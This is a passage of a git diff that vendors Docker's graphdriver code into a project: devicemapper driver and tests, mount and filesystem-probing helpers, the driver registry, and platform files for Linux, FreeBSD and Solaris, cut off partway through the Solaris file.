+// 				 * the block device */
+// 	char data[7];		/* padding or data */
+// };
+
+// struct target {
+// 	uint64_t start;
+// 	uint64_t length;
+// 	char *type;
+// 	char *params;
+
+// 	struct target *next;
+// };
+
+// typedef enum {
+// 	DM_ADD_NODE_ON_RESUME, /* add /dev/mapper node with dmsetup resume */
+// 	DM_ADD_NODE_ON_CREATE  /* add /dev/mapper node with dmsetup create */
+// } dm_add_node_t;
+
+// struct dm_task {
+// 	int type;
+// 	char *dev_name;
+// 	char *mangled_dev_name;
+
+// 	struct target *head, *tail;
+
+// 	int read_only;
+// 	uint32_t event_nr;
+// 	int major;
+// 	int minor;
+// 	int allow_default_major_fallback;
+// 	uid_t uid;
+// 	gid_t gid;
+// 	mode_t mode;
+// 	uint32_t read_ahead;
+// 	uint32_t read_ahead_flags;
+// 	union {
+// 		struct dm_ioctl *v4;
+// 	} dmi;
+// 	char *newname;
+// 	char *message;
+// 	char *geometry;
+// 	uint64_t sector;
+// 	int no_flush;
+// 	int no_open_count;
+// 	int skip_lockfs;
+// 	int query_inactive_table;
+// 	int suppress_identical_reload;
+// 	dm_add_node_t add_node;
+// 	uint64_t existing_table_size;
+// 	int cookie_set;
+// 	int new_uuid;
+// 	int secure_data;
+// 	int retry_remove;
+// 	int enable_checks;
+// 	int expected_errno;
+
+// 	char *uuid;
+// 	char *mangled_uuid;
+// };
+//
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go
new file mode 100644
index 0000000000..5c2abcefcb
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go
@@ -0,0 +1,110 @@
+// +build linux
+
+package devmapper
+
+import (
+	"fmt"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/daemon/graphdriver/graphtest"
+)
+
+func init() {
+	// Reduce the size the the base fs and loopback for the tests
+	defaultDataLoopbackSize = 300 * 1024 * 1024
+	defaultMetaDataLoopbackSize = 200 * 1024 * 1024
+	defaultBaseFsSize = 300 * 1024 * 1024
+	defaultUdevSyncOverride = true
+	if err := graphtest.InitLoopbacks(); err != nil {
+		panic(err)
+	}
+}
+
+// This avoids creating a new driver for each test if all tests are run
+// Make sure to put new tests between TestDevmapperSetup and TestDevmapperTeardown
+func TestDevmapperSetup(t *testing.T) {
+	graphtest.GetDriver(t, "devicemapper")
+}
+
+func TestDevmapperCreateEmpty(t *testing.T) {
+	graphtest.DriverTestCreateEmpty(t, "devicemapper")
+}
+
+func TestDevmapperCreateBase(t *testing.T) {
+	graphtest.DriverTestCreateBase(t, "devicemapper")
+}
+
+func TestDevmapperCreateSnap(t *testing.T) {
+	graphtest.DriverTestCreateSnap(t, "devicemapper")
+}
+
+func TestDevmapperTeardown(t *testing.T) {
+	graphtest.PutDriver(t)
+}
+
+func TestDevmapperReduceLoopBackSize(t *testing.T) {
+	tenMB := int64(10 * 1024 * 1024)
+	testChangeLoopBackSize(t, -tenMB, defaultDataLoopbackSize, defaultMetaDataLoopbackSize)
+}
+
+func TestDevmapperIncreaseLoopBackSize(t *testing.T) {
+	tenMB := int64(10 * 1024 * 1024)
+	testChangeLoopBackSize(t, tenMB, defaultDataLoopbackSize+tenMB, defaultMetaDataLoopbackSize+tenMB)
+}
+
+func testChangeLoopBackSize(t *testing.T, delta, expectDataSize, expectMetaDataSize int64) {
+	driver := graphtest.GetDriver(t, "devicemapper").(*graphtest.Driver).Driver.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver)
+	defer graphtest.PutDriver(t)
+	// make sure data or metadata loopback size are the default size
+	if s := driver.DeviceSet.Status(); s.Data.Total != uint64(defaultDataLoopbackSize) || s.Metadata.Total != uint64(defaultMetaDataLoopbackSize) {
+		t.Fatalf("data or metadata loop back size is incorrect")
+	}
+	if err := driver.Cleanup(); err != nil {
+		t.Fatal(err)
+	}
+	//Reload
+	d, err := Init(driver.home, []string{
+		fmt.Sprintf("dm.loopdatasize=%d", defaultDataLoopbackSize+delta),
+		fmt.Sprintf("dm.loopmetadatasize=%d", defaultMetaDataLoopbackSize+delta),
+	}, nil, nil)
+	if err != nil {
+		t.Fatalf("error creating devicemapper driver: %v", err)
+	}
+	driver = d.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver)
+	if s := driver.DeviceSet.Status(); s.Data.Total != uint64(expectDataSize) || s.Metadata.Total != uint64(expectMetaDataSize) {
+		t.Fatalf("data or metadata loop back size is incorrect")
+	}
+	if err := driver.Cleanup(); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Make sure devices.Lock() has been release upon return from cleanupDeletedDevices() function
+func TestDevmapperLockReleasedDeviceDeletion(t *testing.T) {
+	driver := graphtest.GetDriver(t, "devicemapper").(*graphtest.Driver).Driver.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver)
+	defer graphtest.PutDriver(t)
+
+	// Call cleanupDeletedDevices() and after the call take and release
+	// DeviceSet Lock. If lock has not been released, this will hang.
+	driver.DeviceSet.cleanupDeletedDevices()
+
+	doneChan := make(chan bool)
+
+	go func() {
+		driver.DeviceSet.Lock()
+		defer driver.DeviceSet.Unlock()
+		doneChan <- true
+	}()
+
+	select {
+	case <-time.After(time.Second * 5):
+		// Timer expired. That means lock was not released upon
+		// function return and we are deadlocked. Release lock
+		// here so that cleanup could succeed and fail the test.
+		driver.DeviceSet.Unlock()
+		t.Fatalf("Could not acquire devices lock after call to cleanupDeletedDevices()")
+	case <-doneChan:
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go
new file mode 100644
index 0000000000..7cf422ce6a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go
@@ -0,0 +1,231 @@
+// +build linux
+
+package devmapper
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path"
+	"strconv"
+
+	"github.com/Sirupsen/logrus"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/devicemapper"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/go-units"
+)
+
+func init() {
+	graphdriver.Register("devicemapper", Init)
+}
+
+// Driver contains the device set mounted and the home directory
+type Driver struct {
+	*DeviceSet
+	home    string
+	uidMaps []idtools.IDMap
+	gidMaps []idtools.IDMap
+	ctr     *graphdriver.RefCounter
+}
+
+// Init creates a driver with the given home and the set of options.
+func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
+	deviceSet, err := NewDeviceSet(home, true, options, uidMaps, gidMaps)
+	if err != nil {
+		return nil, err
+	}
+
+	if err := mount.MakePrivate(home); err != nil {
+		return nil, err
+	}
+
+	d := &Driver{
+		DeviceSet: deviceSet,
+		home:      home,
+		uidMaps:   uidMaps,
+		gidMaps:   gidMaps,
+		ctr:       graphdriver.NewRefCounter(graphdriver.NewDefaultChecker()),
+	}
+
+	return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil
+}
+
+func (d *Driver) String() string {
+	return "devicemapper"
+}
+
+// Status returns the status about the driver in a printable format.
+// Information returned contains Pool Name, Data File, Metadata file, disk usage by
+// the data and metadata, etc.
+func (d *Driver) Status() [][2]string {
+	s := d.DeviceSet.Status()
+
+	status := [][2]string{
+		{"Pool Name", s.PoolName},
+		{"Pool Blocksize", fmt.Sprintf("%s", units.HumanSize(float64(s.SectorSize)))},
+		{"Base Device Size", fmt.Sprintf("%s", units.HumanSize(float64(s.BaseDeviceSize)))},
+		{"Backing Filesystem", s.BaseDeviceFS},
+		{"Data file", s.DataFile},
+		{"Metadata file", s.MetadataFile},
+		{"Data Space Used", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Used)))},
+		{"Data Space Total", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Total)))},
+		{"Data Space Available", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Available)))},
+		{"Metadata Space Used", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Used)))},
+		{"Metadata Space Total", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Total)))},
+		{"Metadata Space Available", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Available)))},
+		{"Thin Pool Minimum Free Space", fmt.Sprintf("%s", units.HumanSize(float64(s.MinFreeSpace)))},
+		{"Udev Sync Supported", fmt.Sprintf("%v", s.UdevSyncSupported)},
+		{"Deferred Removal Enabled", fmt.Sprintf("%v", s.DeferredRemoveEnabled)},
+		{"Deferred Deletion Enabled", fmt.Sprintf("%v", s.DeferredDeleteEnabled)},
+		{"Deferred Deleted Device Count", fmt.Sprintf("%v", s.DeferredDeletedDeviceCount)},
+	}
+	if len(s.DataLoopback) > 0 {
+		status = append(status, [2]string{"Data loop file", s.DataLoopback})
+	}
+	if len(s.MetadataLoopback) > 0 {
+		status = append(status, [2]string{"Metadata loop file", s.MetadataLoopback})
+	}
+	if vStr, err := devicemapper.GetLibraryVersion(); err == nil {
+		status = append(status, [2]string{"Library Version", vStr})
+	}
+	return status
+}
+
+// GetMetadata returns a map of information about the device.
+func (d *Driver) GetMetadata(id string) (map[string]string, error) {
+	m, err := d.DeviceSet.exportDeviceMetadata(id)
+
+	if err != nil {
+		return nil, err
+	}
+
+	metadata := make(map[string]string)
+	metadata["DeviceId"] = strconv.Itoa(m.deviceID)
+	metadata["DeviceSize"] = strconv.FormatUint(m.deviceSize, 10)
+	metadata["DeviceName"] = m.deviceName
+	return metadata, nil
+}
+
+// Cleanup unmounts a device.
+func (d *Driver) Cleanup() error {
+	err := d.DeviceSet.Shutdown(d.home)
+
+	if err2 := mount.Unmount(d.home); err == nil {
+		err = err2
+	}
+
+	return err
+}
+
+// CreateReadWrite creates a layer that is writable for use as a container
+// file system.
+func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
+	return d.Create(id, parent, opts)
+}
+
+// Create adds a device with a given id and the parent.
+func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
+	var storageOpt map[string]string
+	if opts != nil {
+		storageOpt = opts.StorageOpt
+	}
+
+	if err := d.DeviceSet.AddDevice(id, parent, storageOpt); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// Remove removes a device with a given id, unmounts the filesystem.
+func (d *Driver) Remove(id string) error {
+	if !d.DeviceSet.HasDevice(id) {
+		// Consider removing a non-existing device a no-op
+		// This is useful to be able to progress on container removal
+		// if the underlying device has gone away due to earlier errors
+		return nil
+	}
+
+	// This assumes the device has been properly Get/Put:ed and thus is unmounted
+	if err := d.DeviceSet.DeleteDevice(id, false); err != nil {
+		return err
+	}
+
+	mp := path.Join(d.home, "mnt", id)
+	if err := os.RemoveAll(mp); err != nil && !os.IsNotExist(err) {
+		return err
+	}
+
+	return nil
+}
+
+// Get mounts a device with given id into the root filesystem
+func (d *Driver) Get(id, mountLabel string) (string, error) {
+	mp := path.Join(d.home, "mnt", id)
+	rootFs := path.Join(mp, "rootfs")
+	if count := d.ctr.Increment(mp); count > 1 {
+		return rootFs, nil
+	}
+
+	uid, gid, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
+	if err != nil {
+		d.ctr.Decrement(mp)
+		return "", err
+	}
+
+	// Create the target directories if they don't exist
+	if err := idtools.MkdirAllAs(path.Join(d.home, "mnt"), 0755, uid, gid); err != nil && !os.IsExist(err) {
+		d.ctr.Decrement(mp)
+		return "", err
+	}
+	if err := idtools.MkdirAs(mp, 0755, uid, gid); err != nil && !os.IsExist(err) {
+		d.ctr.Decrement(mp)
+		return "", err
+	}
+
+	// Mount the device
+	if err := d.DeviceSet.MountDevice(id, mp, mountLabel); err != nil {
+		d.ctr.Decrement(mp)
+		return "", err
+	}
+
+	if err := idtools.MkdirAllAs(rootFs, 0755, uid, gid); err != nil && !os.IsExist(err) {
+		d.ctr.Decrement(mp)
+		d.DeviceSet.UnmountDevice(id, mp)
+		return "", err
+	}
+
+	idFile := path.Join(mp, "id")
+	if _, err := os.Stat(idFile); err != nil && os.IsNotExist(err) {
+		// Create an "id" file with the container/image id in it to help reconstruct this in case
+		// of later problems
+		if err := ioutil.WriteFile(idFile, []byte(id), 0600); err != nil {
+			d.ctr.Decrement(mp)
+			d.DeviceSet.UnmountDevice(id, mp)
+			return "", err
+		}
+	}
+
+	return rootFs, nil
+}
+
+// Put unmounts a device and removes it.
+func (d *Driver) Put(id string) error {
+	mp := path.Join(d.home, "mnt", id)
+	if count := d.ctr.Decrement(mp); count > 0 {
+		return nil
+	}
+	err := d.DeviceSet.UnmountDevice(id, mp)
+	if err != nil {
+		logrus.Errorf("devmapper: Error unmounting device %s: %s", id, err)
+	}
+	return err
+}
+
+// Exists checks to see if the device exists.
+func (d *Driver) Exists(id string) bool {
+	return d.DeviceSet.HasDevice(id)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go
new file mode 100644
index 0000000000..cca1fe1b38
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go
@@ -0,0 +1,89 @@
+// +build linux
+
+package devmapper
+
+import (
+	"bytes"
+	"fmt"
+	"os"
+	"path/filepath"
+	"syscall"
+)
+
+// FIXME: this is copy-pasted from the aufs driver.
+// It should be moved into the core.
+
+// Mounted returns true if a mount point exists.
+func Mounted(mountpoint string) (bool, error) {
+	mntpoint, err := os.Stat(mountpoint)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return false, nil
+		}
+		return false, err
+	}
+	parent, err := os.Stat(filepath.Join(mountpoint, ".."))
+	if err != nil {
+		return false, err
+	}
+	mntpointSt := mntpoint.Sys().(*syscall.Stat_t)
+	parentSt := parent.Sys().(*syscall.Stat_t)
+	return mntpointSt.Dev != parentSt.Dev, nil
+}
+
+type probeData struct {
+	fsName string
+	magic  string
+	offset uint64
+}
+
+// ProbeFsType returns the filesystem name for the given device id.
+func ProbeFsType(device string) (string, error) {
+	probes := []probeData{
+		{"btrfs", "_BHRfS_M", 0x10040},
+		{"ext4", "\123\357", 0x438},
+		{"xfs", "XFSB", 0},
+	}
+
+	maxLen := uint64(0)
+	for _, p := range probes {
+		l := p.offset + uint64(len(p.magic))
+		if l > maxLen {
+			maxLen = l
+		}
+	}
+
+	file, err := os.Open(device)
+	if err != nil {
+		return "", err
+	}
+	defer file.Close()
+
+	buffer := make([]byte, maxLen)
+	l, err := file.Read(buffer)
+	if err != nil {
+		return "", err
+	}
+
+	if uint64(l) != maxLen {
+		return "", fmt.Errorf("devmapper: unable to detect filesystem type of %s, short read", device)
+	}
+
+	for _, p := range probes {
+		if bytes.Equal([]byte(p.magic), buffer[p.offset:p.offset+uint64(len(p.magic))]) {
+			return p.fsName, nil
+		}
+	}
+
+	return "", fmt.Errorf("devmapper: Unknown filesystem type on %s", device)
+}
+
+func joinMountOptions(a, b string) string {
+	if a == "" {
+		return b
+	}
+	if b == "" {
+		return a
+	}
+	return a + "," + b
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver.go
new file mode 100644
index 0000000000..f0bce562b7
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver.go
@@ -0,0 +1,270 @@
+package graphdriver
+
+import (
+	"errors"
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/vbatts/tar-split/tar/storage"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/plugingetter"
+)
+
+// FsMagic unsigned id of the filesystem in use.
+type FsMagic uint32
+
+const (
+	// FsMagicUnsupported is a predefined constant value other than a valid filesystem id.
+	FsMagicUnsupported = FsMagic(0x00000000)
+)
+
+var (
+	// All registered drivers
+	drivers map[string]InitFunc
+
+	// ErrNotSupported returned when driver is not supported.
+	ErrNotSupported = errors.New("driver not supported")
+	// ErrPrerequisites retuned when driver does not meet prerequisites.
+	ErrPrerequisites = errors.New("prerequisites for driver not satisfied (wrong filesystem?)")
+	// ErrIncompatibleFS returned when file system is not supported.
+	ErrIncompatibleFS = fmt.Errorf("backing file system is unsupported for this graph driver")
+)
+
+//CreateOpts contains optional arguments for Create() and CreateReadWrite()
+// methods.
+type CreateOpts struct {
+	MountLabel string
+	StorageOpt map[string]string
+}
+
+// InitFunc initializes the storage driver.
+type InitFunc func(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (Driver, error)
+
+// ProtoDriver defines the basic capabilities of a driver.
+// This interface exists solely to be a minimum set of methods
+// for client code which choose not to implement the entire Driver
+// interface and use the NaiveDiffDriver wrapper constructor.
+//
+// Use of ProtoDriver directly by client code is not recommended.
+type ProtoDriver interface {
+	// String returns a string representation of this driver.
+	String() string
+	// CreateReadWrite creates a new, empty filesystem layer that is ready
+	// to be used as the storage for a container. Additional options can
+	// be passed in opts. parent may be "" and opts may be nil.
+	CreateReadWrite(id, parent string, opts *CreateOpts) error
+	// Create creates a new, empty, filesystem layer with the
+	// specified id and parent and options passed in opts. Parent
+	// may be "" and opts may be nil.
+	Create(id, parent string, opts *CreateOpts) error
+	// Remove attempts to remove the filesystem layer with this id.
+	Remove(id string) error
+	// Get returns the mountpoint for the layered filesystem referred
+	// to by this id. You can optionally specify a mountLabel or "".
+	// Returns the absolute path to the mounted layered filesystem.
+	Get(id, mountLabel string) (dir string, err error)
+	// Put releases the system resources for the specified id,
+	// e.g, unmounting layered filesystem.
+	Put(id string) error
+	// Exists returns whether a filesystem layer with the specified
+	// ID exists on this driver.
+	Exists(id string) bool
+	// Status returns a set of key-value pairs which give low
+	// level diagnostic status about this driver.
+	Status() [][2]string
+	// Returns a set of key-value pairs which give low level information
+	// about the image/container driver is managing.
+	GetMetadata(id string) (map[string]string, error)
+	// Cleanup performs necessary tasks to release resources
+	// held by the driver, e.g., unmounting all layered filesystems
+	// known to this driver.
+	Cleanup() error
+}
+
+// DiffDriver is the interface to use to implement graph diffs
+type DiffDriver interface {
+	// Diff produces an archive of the changes between the specified
+	// layer and its parent layer which may be "".
+	Diff(id, parent string) (io.ReadCloser, error)
+	// Changes produces a list of changes between the specified layer
+	// and its parent layer. If parent is "", then all changes will be ADD changes.
+	Changes(id, parent string) ([]archive.Change, error)
+	// ApplyDiff extracts the changeset from the given diff into the
+	// layer with the specified id and parent, returning the size of the
+	// new layer in bytes.
+	// The archive.Reader must be an uncompressed stream.
+	ApplyDiff(id, parent string, diff io.Reader) (size int64, err error)
+	// DiffSize calculates the changes between the specified id
+	// and its parent and returns the size in bytes of the changes
+	// relative to its base filesystem directory.
+	DiffSize(id, parent string) (size int64, err error)
+}
+
+// Driver is the interface for layered/snapshot file system drivers.
+type Driver interface {
+	ProtoDriver
+	DiffDriver
+}
+
+// DiffGetterDriver is the interface for layered file system drivers that
+// provide a specialized function for getting file contents for tar-split.
+type DiffGetterDriver interface {
+	Driver
+	// DiffGetter returns an interface to efficiently retrieve the contents
+	// of files in a layer.
+	DiffGetter(id string) (FileGetCloser, error)
+}
+
+// FileGetCloser extends the storage.FileGetter interface with a Close method
+// for cleaning up.
+type FileGetCloser interface {
+	storage.FileGetter
+	// Close cleans up any resources associated with the FileGetCloser.
+	Close() error
+}
+
+// Checker makes checks on specified filesystems.
+type Checker interface {
+	// IsMounted returns true if the provided path is mounted for the specific checker
+	IsMounted(path string) bool
+}
+
+func init() {
+	drivers = make(map[string]InitFunc)
+}
+
+// Register registers an InitFunc for the driver.
+func Register(name string, initFunc InitFunc) error {
+	if _, exists := drivers[name]; exists {
+		return fmt.Errorf("Name already registered %s", name)
+	}
+	drivers[name] = initFunc
+
+	return nil
+}
+
+// GetDriver initializes and returns the registered driver
+func GetDriver(name string, pg plugingetter.PluginGetter, config Options) (Driver, error) {
+	if initFunc, exists := drivers[name]; exists {
+		return initFunc(filepath.Join(config.Root, name), config.DriverOptions, config.UIDMaps, config.GIDMaps)
+	}
+
+	pluginDriver, err := lookupPlugin(name, pg, config)
+	if err == nil {
+		return pluginDriver, nil
+	}
+	logrus.WithError(err).WithField("driver", name).WithField("home-dir", config.Root).Error("Failed to GetDriver graph")
+	return nil, ErrNotSupported
+}
+
+// getBuiltinDriver initializes and returns the registered driver, but does not try to load from plugins
+func getBuiltinDriver(name, home string, options []string, uidMaps, gidMaps []idtools.IDMap) (Driver, error) {
+	if initFunc, exists := drivers[name]; exists {
+		return initFunc(filepath.Join(home, name), options, uidMaps, gidMaps)
+	}
+	logrus.Errorf("Failed to built-in GetDriver graph %s %s", name, home)
+	return nil, ErrNotSupported
+}
+
+// Options is used to initialize a graphdriver
+type Options struct {
+	Root                string
+	DriverOptions       []string
+	UIDMaps             []idtools.IDMap
+	GIDMaps             []idtools.IDMap
+	ExperimentalEnabled bool
+}
+
+// New creates the driver and initializes it at the specified root.
+func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, error) {
+	if name != "" {
+		logrus.Debugf("[graphdriver] trying provided driver: %s", name) // so the logs show specified driver
+		return GetDriver(name, pg, config)
+	}
+
+	// Guess for prior driver
+	driversMap := scanPriorDrivers(config.Root)
+	for _, name := range priority {
+		if name == "vfs" {
+			// don't use vfs even if there is state present.
+			continue
+		}
+		if _, prior := driversMap[name]; prior {
+			// of the state found from prior drivers, check in order of our priority
+			// which we would prefer
+			driver, err := getBuiltinDriver(name, config.Root, config.DriverOptions, config.UIDMaps, config.GIDMaps)
+			if err != nil {
+				// unlike below, we will return error here, because there is prior
+				// state, and now it is no longer supported/prereq/compatible, so
+				// something changed and needs attention. Otherwise the daemon's
+				// images would just "disappear".
+				logrus.Errorf("[graphdriver] prior storage driver %s failed: %s", name, err)
+				return nil, err
+			}
+
+			// abort starting when there are other prior configured drivers
+			// to ensure the user explicitly selects the driver to load
+			if len(driversMap)-1 > 0 {
+				var driversSlice []string
+				for name := range driversMap {
+					driversSlice = append(driversSlice, name)
+				}
+
+				return nil, fmt.Errorf("%s contains several valid graphdrivers: %s; Please cleanup or explicitly choose storage driver (-s <DRIVER>)", config.Root, strings.Join(driversSlice, ", "))
+			}
+
+			logrus.Infof("[graphdriver] using prior storage driver: %s", name)
+			return driver, nil
+		}
+	}
+
+	// Check for priority drivers first
+	for _, name := range priority {
+		driver, err := getBuiltinDriver(name, config.Root, config.DriverOptions, config.UIDMaps, config.GIDMaps)
+		if err != nil {
+			if isDriverNotSupported(err) {
+				continue
+			}
+			return nil, err
+		}
+		return driver, nil
+	}
+
+	// Check all registered drivers if no priority driver is found
+	for name, initFunc := range drivers {
+		driver, err := initFunc(filepath.Join(config.Root, name), config.DriverOptions, config.UIDMaps, config.GIDMaps)
+		if err != nil {
+			if isDriverNotSupported(err) {
+				continue
+			}
+			return nil, err
+		}
+		return driver, nil
+	}
+	return nil, fmt.Errorf("No supported storage backend found")
+}
+
+// isDriverNotSupported returns true if the error initializing
+// the graph driver is a non-supported error.
+func isDriverNotSupported(err error) bool {
+	return err == ErrNotSupported || err == ErrPrerequisites || err == ErrIncompatibleFS
+}
+
+// scanPriorDrivers returns an un-ordered scan of directories of prior storage drivers
+func scanPriorDrivers(root string) map[string]bool {
+	driversMap := make(map[string]bool)
+
+	for driver := range drivers {
+		p := filepath.Join(root, driver)
+		if _, err := os.Stat(p); err == nil && driver != "vfs" {
+			driversMap[driver] = true
+		}
+	}
+	return driversMap
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go
new file mode 100644
index 0000000000..2891a84f3a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go
@@ -0,0 +1,19 @@
+package graphdriver
+
+import "syscall"
+
+var (
+	// Slice of drivers that should be used in an order
+	priority = []string{
+		"zfs",
+	}
+)
+
+// Mounted checks if the given path is mounted as the fs type
+func Mounted(fsType FsMagic, mountPath string) (bool, error) {
+	var buf syscall.Statfs_t
+	if err := syscall.Statfs(mountPath, &buf); err != nil {
+		return false, err
+	}
+	return FsMagic(buf.Type) == fsType, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go
new file mode 100644
index 0000000000..5c8d0e2301
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go
@@ -0,0 +1,135 @@
+// +build linux
+
+package graphdriver
+
+import (
+	"path/filepath"
+	"syscall"
+
+	"github.com/docker/docker/pkg/mount"
+)
+
+const (
+	// FsMagicAufs filesystem id for Aufs
+	FsMagicAufs = FsMagic(0x61756673)
+	// FsMagicBtrfs filesystem id for Btrfs
+	FsMagicBtrfs = FsMagic(0x9123683E)
+	// FsMagicCramfs filesystem id for Cramfs
+	FsMagicCramfs = FsMagic(0x28cd3d45)
+	// FsMagicEcryptfs filesystem id for eCryptfs
+	FsMagicEcryptfs = FsMagic(0xf15f)
+	// FsMagicExtfs filesystem id for Extfs
+	FsMagicExtfs = FsMagic(0x0000EF53)
+	// FsMagicF2fs filesystem id for F2fs
+	FsMagicF2fs = FsMagic(0xF2F52010)
+	// FsMagicGPFS filesystem id for GPFS
+	FsMagicGPFS = FsMagic(0x47504653)
+	// FsMagicJffs2Fs filesystem if for Jffs2Fs
+	FsMagicJffs2Fs = FsMagic(0x000072b6)
+	// FsMagicJfs filesystem id for Jfs
+	FsMagicJfs = FsMagic(0x3153464a)
+	// FsMagicNfsFs filesystem id for NfsFs
+	FsMagicNfsFs = FsMagic(0x00006969)
+	// FsMagicRAMFs filesystem id for RamFs
+	FsMagicRAMFs = FsMagic(0x858458f6)
+	// FsMagicReiserFs filesystem id for ReiserFs
+	FsMagicReiserFs = FsMagic(0x52654973)
+	// FsMagicSmbFs filesystem id for SmbFs
+	FsMagicSmbFs = FsMagic(0x0000517B)
+	// FsMagicSquashFs filesystem id for SquashFs
+	FsMagicSquashFs = FsMagic(0x73717368)
+	// FsMagicTmpFs filesystem id for TmpFs
+	FsMagicTmpFs = FsMagic(0x01021994)
+	// FsMagicVxFS filesystem id for VxFs
+	FsMagicVxFS = FsMagic(0xa501fcf5)
+	// FsMagicXfs filesystem id for Xfs
+	FsMagicXfs = FsMagic(0x58465342)
+	// FsMagicZfs filesystem id for Zfs
+	FsMagicZfs = FsMagic(0x2fc12fc1)
+	// FsMagicOverlay filesystem id for overlay
+	FsMagicOverlay = FsMagic(0x794C7630)
+)
+
+var (
+	// Slice of drivers that should be used in an order
+	priority = []string{
+		"aufs",
+		"btrfs",
+		"zfs",
+		"overlay2",
+		"overlay",
+		"devicemapper",
+		"vfs",
+	}
+
+	// FsNames maps filesystem id to name of the filesystem.
+	FsNames = map[FsMagic]string{
+		FsMagicAufs:        "aufs",
+		FsMagicBtrfs:       "btrfs",
+		FsMagicCramfs:      "cramfs",
+		FsMagicExtfs:       "extfs",
+		FsMagicF2fs:        "f2fs",
+		FsMagicGPFS:        "gpfs",
+		FsMagicJffs2Fs:     "jffs2",
+		FsMagicJfs:         "jfs",
+		FsMagicNfsFs:       "nfs",
+		FsMagicOverlay:     "overlayfs",
+		FsMagicRAMFs:       "ramfs",
+		FsMagicReiserFs:    "reiserfs",
+		FsMagicSmbFs:       "smb",
+		FsMagicSquashFs:    "squashfs",
+		FsMagicTmpFs:       "tmpfs",
+		FsMagicUnsupported: "unsupported",
+		FsMagicVxFS:        "vxfs",
+		FsMagicXfs:         "xfs",
+		FsMagicZfs:         "zfs",
+	}
+)
+
+// GetFSMagic returns the filesystem id given the path.
+func GetFSMagic(rootpath string) (FsMagic, error) {
+	var buf syscall.Statfs_t
+	if err := syscall.Statfs(filepath.Dir(rootpath), &buf); err != nil {
+		return 0, err
+	}
+	return FsMagic(buf.Type), nil
+}
+
+// NewFsChecker returns a checker configured for the provied FsMagic
+func NewFsChecker(t FsMagic) Checker {
+	return &fsChecker{
+		t: t,
+	}
+}
+
+type fsChecker struct {
+	t FsMagic
+}
+
+func (c *fsChecker) IsMounted(path string) bool {
+	m, _ := Mounted(c.t, path)
+	return m
+}
+
+// NewDefaultChecker returns a check that parses /proc/mountinfo to check
+// if the specified path is mounted.
+func NewDefaultChecker() Checker {
+	return &defaultChecker{}
+}
+
+type defaultChecker struct {
+}
+
+func (c *defaultChecker) IsMounted(path string) bool {
+	m, _ := mount.Mounted(path)
+	return m
+}
+
+// Mounted checks if the given path is mounted as the fs type
+func Mounted(fsType FsMagic, mountPath string) (bool, error) {
+	var buf syscall.Statfs_t
+	if err := syscall.Statfs(mountPath, &buf); err != nil {
+		return false, err
+	}
+	return FsMagic(buf.Type) == fsType, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go
new file mode 100644
index 0000000000..7daf01c32d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go
@@ -0,0 +1,97 @@
+// +build solaris,cgo
+
+package graphdriver
+
+/*
+#include <sys/statvfs.h>
+#include <stdlib.h>
+
+static inline struct statvfs *getstatfs(char *s) {
+        struct statvfs *buf;
+        int err;
+        buf = (struct statvfs *)malloc(sizeof(struct statvfs));
+        err = statvfs(s, buf);
+        return buf;
+}
+*/
+import "C"
+import (
+	"path/filepath"
+	"unsafe"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/mount"
+)
+
+const (
+	// FsMagicZfs filesystem id for Zfs
